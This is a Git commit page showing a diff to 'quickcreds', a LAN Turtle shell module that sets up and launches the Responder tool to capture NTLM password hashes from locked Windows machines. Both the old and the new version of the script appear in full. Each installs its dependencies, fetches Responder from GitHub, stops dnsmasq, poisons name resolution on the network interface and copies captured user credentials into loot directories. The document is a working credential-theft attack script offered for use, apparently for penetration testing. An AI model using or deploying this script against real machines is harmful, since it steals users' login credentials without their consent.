hak5
/
lanturtle-modules
mirror of https://github.com/hak5/lanturtle-modules.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed quickcreds with new responder size. (#43) 

* Fixed quickcreds with new responder size.

Forces use of SD card amongst some other small fixes.

* corrected fixes

* remove comments

* fixed indexing

* Fixed indexing

* QuickCreds: Remove all trailing whitespace, fix indentation, drop unwanted comments

* Removed odd comment

Co-authored-by: Marc Egerton <foxtrot@malloc.me>
pull/45/head
Theo 2021-04-09 23:49:35 +02:00 committed by GitHub
parent e3ce49c4f3
commit 1452617da4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 148 additions and 126 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

274
modules/quickcreds
View File

@ -1,8 +1,9 @@
#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.3"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
VERSION="1.4"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the LED will light solid. Author: Hak5Darren. Credit: Mubix."
CONF=/tmp/QuickCreds.form
# All "dialog" functionality is related to the Turtle shell
: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
@ -10,139 +11,160 @@ CONF=/tmp/QuickCreds.form
: ${DIALOG_ITEM_HELP=4}
: ${DIALOG_ESC=255}
LOOTDIR="/root/loot/quickcreds/"
RESPLOG=$LOOTDIR"responder.log"
RESPROOT="/sd"
RESPTEMPDL="/tmp/ResponderDownload/"
RESPURL="https://github.com/lgandx/Responder/archive/master.zip"
RESPLOGDIR=$RESPROOT/"Responder/logs"
SLEEPTIMER="1"
function configure {
# dialog --title "QuickCreds" --msgbox "\n\
# Dependencies will be installed. An Internet connection is required.\n\
# Upon configuration creds will be saved to /root/loot/ on boot." 9 72
dialog --title "QuickCreds" \
--yesno "\nInstall dependencies and configure QuickCreds?\n\
An Internet connection is required for installation.\n" 8 60
response=$?
case $response in
0) ;;
1) exit ;;
255) exit ;;
esac
# Check to see if QuickCreds has already been configured
if [[ -d /root/loot || -s /root/loot/responder.log ]];
then
dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\
Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
exit 1
fi
# Check for Internet connection
ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
:
} || {
dialog --title "QuickCreds" --msgbox "\n\
The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
exit 1
}
# Install dependencies
opkg update | dialog --progressbox "Updating opkg" 14 72
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
then
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
fi
if [[ ! $(opkg list-installed | grep screen) ]];
then
opkg install screen | dialog --progressbox "Installing dependency screen" 14 72
fi
if [[ ! $(opkg list-installed | grep python-openssl) ]];
then
opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72
fi
if [[ ! $(opkg list-installed | grep coreutils-sleep) ]];
then
opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72
fi
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
then
rm -rf /etc/turtle/Responder
rm -rf /tmp/v2.3.3.5.tar.gz*
wget --progress=dot https://github.com/lgandx/Responder/archive/v2.3.3.5.tar.gz -P /tmp 2>&1 | dialog --progressbox "Download dependency responder" 14 72
mkdir /etc/turtle/Responder
tar xzf /tmp/v2.3.3.5.tar.gz -C /etc/turtle/Responder 2>&1 | dialog --progressbox "Install dependency responder" 14 72
rm -rf /tmp/v2.3.3.5.tar.gz*
fi
# Setup loot directory and complete setup
mkdir /root/loot
touch /root/loot/responder.log
dialog --title "QuickCreds" --msgbox "\n\
Configuration complete. Creds will be saved to /root/loot\n\
Enable this module to have it start the attack on boot.\n" 9 72
}
function start {
# Stop on-off-on DHCP blink pattern script
echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
echo ""
echo "QuickCreds started."
echo "LED will blink rapidly while QuickCreds is running."
echo "LED will light solid upon NTLM hash capture."
echo ""
echo "If starting this module from the Turtle Shell menu,"
echo "press CTRL+C to return."
echo "Starting attack..." >> /root/loot/responder.log
# Create new numbered loot directory and symlink it from Responder logs
cd /root/loot
dircount=$(ls -lad /root/loot/* | wc -l)
mkdir /root/loot/$((dircount))
# Delete all current Responder logs
rm -rf /etc/turtle/Responder/logs
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
# Stop dnsmasq
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
# Blink upon hash capture
while true; do
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
then
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
then
echo "Creds saved!" >> /root/loot/responder.log
#copy all responder logs to loot directory
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
finished
# If SD card is mounted continue if not fail due to not enough space.
if grep -qs $RESPROOT /proc/mounts; then
/bin/echo "SD card is mounted."
else
/usr/bin/dialog --title "QuickCreds" --msgbox "An SD card is required to install this module." 9 72
exit 1
fi
fi
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
sleep 1
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
sleep 1
done
# Ask if the user really wants to install the module and its dependencies
/usr/bin/dialog --title "QuickCreds" --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60
response=$?
case $response in
0) ;;
1) exit ;;
255) exit ;;
esac
# Check to see if QuickCreds has already been configured
if [[ -d "$LOOTDIR" || -s "$RESPLOG" ]]; then
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to $LOOTDIR.\nEnable this module to attack on boot." 9 72
exit 1
fi
# Check for Internet connection
/bin/ping -q -w 5 -c 1 www.google.com &> /dev/null && {
:
} || {
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again." 9 72
exit 1
}
# Install dependencies
/bin/opkg update | /usr/bin/dialog --progressbox "Updating opkg" 14 72
if [[ ! $(/bin/opkg list-installed | /bin/grep python-sqlite3) ]]; then
/bin/opkg install python-sqlite3 | /usr/bin/dialog --progressbox "Installing dependency python-sqlite3" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep screen) ]]; then
/bin/opkg install screen | /usr/bin/dialog --progressbox "Installing dependency screen" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep python-openssl) ]]; then
/bin/opkg install python-openssl | /usr/bin/dialog --progressbox "Installing dependency python-openssl" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep coreutils-sleep) ]]; then
/bin/opkg install coreutils-sleep | /usr/bin/dialog --progressbox "Installing dependency coreutils-sleep" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep unzip) ]]; then
/bin/opkg install unzip | /usr/bin/dialog --progressbox "Installing dependency unzip" 14 72
fi
# Check if Responder is installed (not the module available in the Turtle "GUI", but the tool taken straight from GitHub)
if [[ ! -d "$RESPROOT" || ! -s "$RESPROOT"Responder.py ]]; then
# Clean up
/bin/rm -rf "$RESPROOT"Responder/
/bin/rm -rf "$RESPTEMPDL"master.zip*
# Create new
/bin/mkdir -p "$RESPTEMPDL"
# Download and extract
/usr/bin/wget --progress=dot "$RESPURL" -P "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Download dependency responder" 14 72
# Unpack the GitHub download
/usr/bin/unzip "$RESPTEMPDL"master.zip -d "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Unpacking dependency responder" 14 72
/bin/rm "$RESPTEMPDL"Responder-master/tools/MultiRelay/bin/*.exe
/bin/mv "$RESPTEMPDL"Responder-master "$RESPTEMPDL"Responder
/bin/mv "$RESPTEMPDL"Responder "$RESPROOT"
/bin/rm -rf "$RESPTEMPDL"master.zip*
fi
# Setup loot directory and complete setup
/bin/mkdir -p "$LOOTDIR"
/usr/bin/dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to $LOOTDIR\nEnable this module to have it start the attack on boot.\n" 9 72
}
function finished {
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
exit
/bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
/bin/sync
exit
}
function start {
# Stop on-off-on DHCP blink pattern script, this is what causes the "Terminated" text to appear if running QuickCreds from within the Turtle module system in the Turtle "GUI"
/bin/echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
/bin/echo ""
/bin/echo "QuickCreds started."
/bin/echo "The orange LED will blink while QuickCreds is running."
/bin/echo "The orange LED will turn solid upon NTLM hash capture."
/bin/echo ""
/bin/echo "If starting this module from the Turtle Shell menu,"
/bin/echo "press CTRL+C to return."
# Create new numbered loot directory and symlink it from Responder logs
/bin/mkdir -p $LOOTDIR
cd $LOOTDIR
dircount=$(/bin/ls -lad $LOOTDIR/* | /usr/bin/wc -l)
# Adjust the number when creating the numbered lootdir for this session, if no existing dirs (i.e. wc -l = 0) then start with 1 instead of 0 otherwise there will be a gap between 0 and 2
if [[ $((dircount)) == 0 ]]; then dircount=1 ; fi
/bin/mkdir $LOOTDIR"Creds"$((dircount))
# Delete all current Responder logs
/bin/rm -rf $RESPLOGDIR
/bin/ln -s $LOOTDIR"Creds"$((dircount)) $RESPLOGDIR
# Saving interface info, surplus information and can be deleted
/sbin/ifconfig > $LOOTDIR"Creds"$((dircount))/ifconfig_dump.log
/bin/echo "Creds$((dircount)) - Initiating Responder attack..." >> $RESPLOG
# Stop dnsmasq
/bin/echo "Creds$((dircount)) - Stopping dnsmasq" >> $RESPLOG
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
/bin/echo "Creds$((dircount)) - Starting screen and Responder" >> $RESPLOG
/usr/sbin/screen -dmS responder /bin/bash -c 'cd /sd/Responder; /usr/bin/python /sd/Responder/Responder.py -I eth0 -w -r -d -P'
/bin/echo "Creds$((dircount)) - LED blink pattern during attack enabled" >> $RESPLOG
# Blink upon hash capture
while true; do
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [[ $(/bin/grep -v '\$:' $RESPLOGDIR/*NTLM* 2>/dev/null) ]]; then
/bin/echo "Creds$((dircount)) - Found user creds NTLM file in the logs directory!" >> $RESPLOG
/bin/echo "Creds$((dircount)) - Creds obtained and saved" >> $RESPLOG
#Copy all responder logs to loot directory
/bin/echo "Creds$((dircount)) - Copying the Responder native logs to loot directory" >> $RESPLOG
/bin/cp $RESPLOGDIR/* $LOOTDIR"Creds"$((dircount))
/bin/echo "Creds$((dircount)) - Calling the finished function" >> $RESPLOG
finished
fi
/bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
/bin/sleep $SLEEPTIMER
/bin/echo 0 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
/bin/sleep $SLEEPTIMER
done
}
function stop {
kill $(ps | grep [R]esponder | awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
echo "QuickCreds Stopped"
/bin/kill $(/bin/ps | /bin/grep [R]esponder | /usr/bin/awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
/bin/echo "QuickCreds Stopped"
}
function status {
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
if [[ $(/bin/ps | /bin/grep -w [R]esponder.py) ]]; then /bin/echo "1"; else /bin/echo "0"; fi
}